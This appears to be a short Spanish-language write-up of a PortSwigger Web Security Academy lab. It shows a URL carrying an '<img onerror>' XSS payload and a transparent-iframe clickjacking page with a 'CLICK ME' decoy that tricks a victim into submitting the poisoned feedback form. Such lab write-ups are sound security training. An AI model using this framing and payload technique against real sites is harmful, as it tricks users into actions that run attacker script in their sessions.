4 - Exploiting clickjacking vulnerability to trigger DOM-based XSS

Esta url carga el XSS en el formulario:

https://0af800da04705913807712c400d8007c.web-security-academy.net/feedback?name=%3Cimg%20src=1%20onerror=print()%3E&email=test%40test.com&subject=test&message=test#feedbackResult

Ahora solo tendríamos que hacer que pinchara en submit feedback.

Por alguna razón no me iba con el clickbandit así que lo tuve que hacer manual :

<style>
	iframe {
		position:relative;
		width:1000px;
		height: 900px;
		opacity: 0.0001;
		z-index: 1;
	}
	div {
		position:absolute;
		top:815px;
		left:80px;
		z-index: 1;
	}
</style>
<div>CLICK ME</div>
<iframe
src="https://0af800da04705913807712c400d8007c.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=hacker@attacker-website.com&subject=test&message=test#feedbackResult"></iframe>